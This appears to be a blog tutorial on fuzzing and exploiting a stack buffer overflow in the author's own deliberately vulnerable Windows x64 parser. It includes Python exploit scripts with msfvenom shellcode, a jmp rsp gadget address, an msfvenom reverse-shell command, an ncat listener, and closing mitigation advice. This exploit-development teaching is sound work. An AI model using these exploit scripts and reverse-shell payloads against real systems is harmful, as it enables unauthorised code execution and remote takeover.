Fuzzing-and-exploiting-a-crash

Hunting 0-days: Exploiting a Custom Binary Parser on Windows x64

0. Introduction

Before a CVE gets a number and a patch, someone had to find it. This is what that process actually looks like, from a fuzzer detecting an anomaly to a reverse shell landing on the attacker’s machine. The classic approaches for finding them are:

Type	Explanation
Static analysis	Disassembling the software and understanding it
Dynamic analysis	Testing and understanding the software’s reactions by debugging and running it
Taint analysis	Studying how the program handles and returns data

Most security researchers rely on existing fuzzers. I wanted to understand what happens underneath so I built one. I integrated a custom Structure-aware seed generator that knows where, how and how intense to mutate the data in order to trigger certain vulnerabilities.

1. Preparation

The environment we are working in is Windows x64.

The file we will be testing is a realistic binary parser. It has 4 vulnerable functions inside and, to test how well my fuzzer performs, I added 4 layers of security that filter the input before parsing it. I then compiled it without stack protector for demonstration purposes.

The fuzzer I used is not publicly available yet since it’s still under development but you can easily use another one like AFL++.

The debugger I used is x64dbg and I developed the exploit and POC (proof of concept) using Python.

2. Fuzzing

To develop the corpus, my fuzzer needs a starting seed, a form of input that our target parses without crashing, like it normally would. If you don’t have a corpus you can find one searching for it on github depending on the extension you need. In my case, my starting seed is a .bin file.

Aiming the fuzzer at the target, loaded with the seed, I get this:

Instantly, it found a crash seed that bypassed the security layers and stopped the process so we can continue our research.

As we can see, the fuzzer tells us that the type of mutation that caused the crash is called Boundary. My tool’s function that creates this kind of mutation looks like this:

This function “lied” about the size of the data we were going to feed to the victim (Length Corruption) resulting in the crash. So with these in mind, we can assume that the crash was caused by a Buffer Overflow.

3. Debugging

Let’s fire up our debugger and find out what actually happened. After loading the target and passing it the crash_DETECTED.bin we can see that the execution stopped here:

Look at the memory dump! It has been overflowed, resulting in an EXCEPTION_ACCESS_VIOLATION error:

4. Gathering information

To confirm the vulnerability and measure the buffer we need to flood it with something called a Cyclic Pattern. This is no longer a big string of “A”-s that overflows the memory, it is a specially crafted payload that let’s us measure how much data we need in order to inject our own code into the Instruction Pointer (RIP). This pointer controls the direction of the processor’s execution, and by overflowing the stack perfectly, we can manipulate it to point to our malware and take control.

To inject our Cyclic Pattern I used the following code, that writes it into another .bin file:

import struct

payload =  bytearray()
payload +=  b'\x01\x02\x03\x04'  # Magic bytes (file format)
payload += struct.pack('<I', 1)  # Version number, converted into Little-Endian
payload +=  b'NormalTx' # OpCode for routing the execution
payload += struct.pack('<I', 0x150)

pattern = (
b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
)

payload += pattern[:200] 

with  open("crash_test.bin", "wb") as f:
		f.write(payload)

Give this to our target using the Command line and look at the registers and the stack:

The RSP displays our pattern, and it begins with 'a5Aa6Aa7Aa8...'. This means two things:

RSP (Stack pointer) is where we have to align our shellcode. It describes what happens when the processor executes what RIP tells it to.
It gets filled after 20 bytes of our pattern.

Section	Dimension	Content
Padding (junk)	12 bytes	`Aa0A a1Aa a2Aa`
RIP (instruction)	8 bytes	`a3Aa a4Aa`
RSP (where it lands)	The rest	`a5Aa 6Aa7` (as shown before)

As you can see the pattern acts as ruler, we measure how many bytes we need to overflow the buffer (Padding), in order to reach the RIP and tell the processor to do (placing the instruction) and then let it execute the malware (RSP).

To do this we also need the following:

How much junk we need to reach the RIP.
What instruction we give it.
Where the processor should land next, in order to execute our shellcode.

4.1 Creating the padding and reaching the RIP

As we discussed before, the padding needs to be at least 12 bytes. BUT in our environment (Windows x64) the processor only “understands” multiples of 8, so the next multiple of 8 after 12 is 16. In conclusion, the dimension of our padding needs at least 16 bytes. Keep this in mind.

4.2 Writing the instruction

The processor parses our padding and reaches the RIP. Here we will leave the address of an instruction that acts like a trampoline right to our malware. This kind of instruction needs to be a jmp rsp. This basically tells it to Jump to the RSP (where the malware is located).

We can find one of these in the target’s memory BUT, we know that ASLR randomizes the addresses so we will use an address directly from one of the Windows DLL’s (kernel32.dll or ntdll.dll):

In a real scenario with ASLR fully enabled, this address would change on every reboot. Defeating it requires either an information leak or a non-ASLR module, which we’ll cover later.

In x64dbg, we navigate to Symbols and look for kernel32.dll or ntdll.dll. Double-click on it and in the CPU tab, hit Ctrl+Shift+B to look for our instruction pattern. Here we insert FF E4 which stands for jmp rsp in hex:

In the References tab there is a list of addresses. We will choose one of these that doesn’t have null octets (00) in it:

Note down this address. We will need it later.

4.3 Placing the shellcode

The processor finally arrives in the RSP. Here is where the magic happens. We will store our shellcode here and before it, we will write a field of NOP’s (No Operation). The processor slides down through these NOP’s like a rollercoaster and lands right in our trap. The field doesn’t need a specific dimension so just to be sure it has some fun before executing the shellcode, we will use 32 octets.

I generated my shellcode using msfvenom. To prove it works, this code only pops up the calculator app.

msfvenom -p windows/x64/exec CMD=calc.exe -f python -b ‘\x00’

5. Proof of concept

Let’s recap before we continue :

The padding needs to be >= 16 octets.
We have the jmp rsp address.
We have the shellcode ready.

Altogether, our Proof of Concept script looks like this:

import struct

payload =  bytearray()
payload +=  b'\x01\x02\x03\x04'  # Magic bytes (file format)
payload += struct.pack('<I', 1)  # Version number, converted into Little-Endian
payload +=  b'NormalTx' # OpCode for routing the execution
payload += struct.pack('<I', 0x150)

data_payload =  bytearray()
data_payload +=  b"A"  *  16 # filling the padding with at least 16 octets

jmp_rsp_address =  0x00007FF8709039D3 # replace with your own jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)

shellcode = (        # msfvenom generated shellcode (CMD=calc.exe)
b"\x53\x56\x57\x55\x54\x58\x66\x83\xE4\xF0\x50\x6A\x60\x5A\x68\x63\x61\x6C\x63"
b"\x54\x59\x48\x29\xD4\x65\x48\x8B\x32\x48\x8B\x76\x18\x48\x8B\x76\x10\x48\xAD"
b"\x48\x8B\x30\x48\x8B\x7E\x30\x03\x57\x3C\x8B\x5C\x17\x28\x8B\x74\x1F\x20\x48"
b"\x01\xFE\x8B\x54\x1F\x24\x0F\xB7\x2C\x17\x8D\x52\x02\xAD\x81\x3C\x07\x57\x69"
b"\x6E\x45\x75\xEF\x8B\x74\x1F\x1C\x48\x01\xFE\x8B\x34\xAE\x48\x01\xF7\x99\xFF"
b"\xD7\x48\x83\xC4\x68\x5C\x5D\x5F\x5E\x5B\xC3"
)
data_payload +=  b"\x90"  *  24
data_payload += shellcode

final_payload = payload + data_payload.ljust(0x150, b'\x90')

with  open("exploit_calc.bin", "wb") as f:
		f.write(final_payload)

After loading the exploit_calc.bin in the target’s debugging session, set the memory permissions to ERW-- (Execute, Read, Write), and run it until the calculator pops up:

Setting the memory permissions to ERW-- is a shortcut in our exploitation process for the sake of the POC. In a future article I will explain how we can program our exploit to set these permissions itself using an *ROP (Return-Oriented Programming) chain*

And there it is! The processor executed our “malware” and opened up the calculator.

6. Exploitation (popping a shell)

We change the previous command to this:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b ‘\x00\x0a\x0d\x20\x09\x0b’ -f python

We use 127.0.0.1 as the listener’s IP address and the port 4444.
The -b flag tells msfvenom to avoid those characters so the processor doesn’t get stuck on them during execution.

Now that we have a new shellcode we can adjust the size of our payload so it aligns with the stack and instruction pointers:

import struct

TOTAL_SIZE  =  0x300  # We make the size bigger, so the shellcode aligns perfectly
PADDING_SIZE  =  16

header =  bytearray()
header +=  b'\x01\x02\x03\x04'
header += struct.pack('<I', 1)
header +=  b'NormalTx'
header += struct.pack('<I', TOTAL_SIZE)

data_payload =  bytearray()
data_payload +=  b"A"  *  PADDING_SIZE

jmp_rsp_address =  0x00007FF8709039D3  # Replace with your jmp_rsp address

data_payload += struct.pack('<Q', jmp_rsp_address)
data_payload +=  b"\x90"  *  24

buf =  b""
buf +=  b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d"
buf +=  b"\x05\xef\xff\xff\xff\x48\xbb\x63\xfe\x15\xf7\x62"
#...  write the shellcode msfvenom generated for you
buf +=  b"\x2e\x64\xa4\xea\x24\xea\x22\x62\x2e\x3d\xe5"  

data_payload += buf

final_content = header + data_payload.ljust(TOTAL_SIZE, b'\x90')

with  open("exploit_shell.bin", "wb") as f:
		f.write(final_content)

We setup a listener in another powershell terminal:

PS D:/> ncat -lvnp 4444

Now let’s feed exploit_shell.bin to our target and see what happens:

And there it is! A reverse shell right into the attacker’s machine, initiated when the processor executed our msfvenom generated shellcode.

7. Conclusion & Mitigation

The Role of the Crash: From Denial of Service to Control

Many people see a program crash as just a “bug” that closes the software, technically known as a Denial of Service (DoS). However, for an exploit developer, a crash is a strong starting point. Here is why the crash file was our best friend:

Vulnerability Confirmation: The crash was the definitive proof that our fuzzer found a “hole” in the security layers. It confirmed that the parser’s logic failed to handle our mutated Boundary input, allowing data to spill out of its assigned memory space.
Debugging: The debugger froze the entire CPU state. This allowed us to inspect the Registers and see exactly where the program stopped working properly. Without the crash, we wouldn’t have known that the RIP (Instruction Pointer) was overwritten with our data.
Identifying the Offset: By looking at the crash in x64dbg, we didn’t just see an error; we saw what was in the registers. This is what allowed us to use a Cyclic Pattern effectively. The crash told us: “You hit the RIP at exactly this byte”.
The Bridge to RCE: A crash is like a car hitting a wall. By analyzing the “skid marks” (memory corruption), we learned how to steer the car around the wall next time. We transformed a destructive event into a constructive one (Remote Code Execution) by replacing the “junk” data that caused the crash with a valid jmp rsp instruction.

In the Information Gathering stage, an attacker is able to scan the target machine for the running software including it’s version. He can replicate everything inside his lab and develop an exploit without even touching the production server or alerting the victim’s security systems. This is called Off-target Debugging.

Even Google uses 25.000 virtual machines and about 100.000 cores fuzzing Chrome to find such bugs before the attackers do. Since Chrome’s launch, they discovered over 30.000 0day vulnerabilities.

How to prevent this?

Use safe functions. The root cause here was a parser that trusted a caller-supplied length without validating it. Bounded functions like memcpy_s() or strncpy() enforce size limits at the call site, but they only help if you pass the correct bounds. The real fix is input validation before any copy operation happens. Treat every length field in a binary protocol as hostile until proven otherwise.
Enable Stack Canaries (/GS). The compiler inserts a random value between the local variables and the return address. Before the function returns, it checks whether that value was tampered with. A classic stack overflow like this one would have been caught before we ever got to control RIP. The execution would have been terminated cleanly before handing us execution.
Don’t disable ASLR or DEP. ASLR randomizes the base addresses of modules on every load, which means the jmp rsp address we hardcoded from kernel32.dll would be different every time. DEP (Data Execution Prevention) would have stopped the shellcode in RSP from running at all, since that memory region isn’t marked executable by default. Together, these two mitigations turn a working exploit into a research problem.

That said, none of these are silver bullets. A determined attacker with enough resources can bypass DEP using an ROP chain. This is a technique that repurposes existing executable code instead of injecting new shellcode. ASLR can be defeated through information leaks. Stack canaries don’t protect against overwrites that skip the canary entirely. This is why defense in depth matters: the goal is to make exploitation so expensive that it isn’t worth it.

In the next article, we’ll look at exactly how a ROP chain bypasses DEP and what it takes to stop one.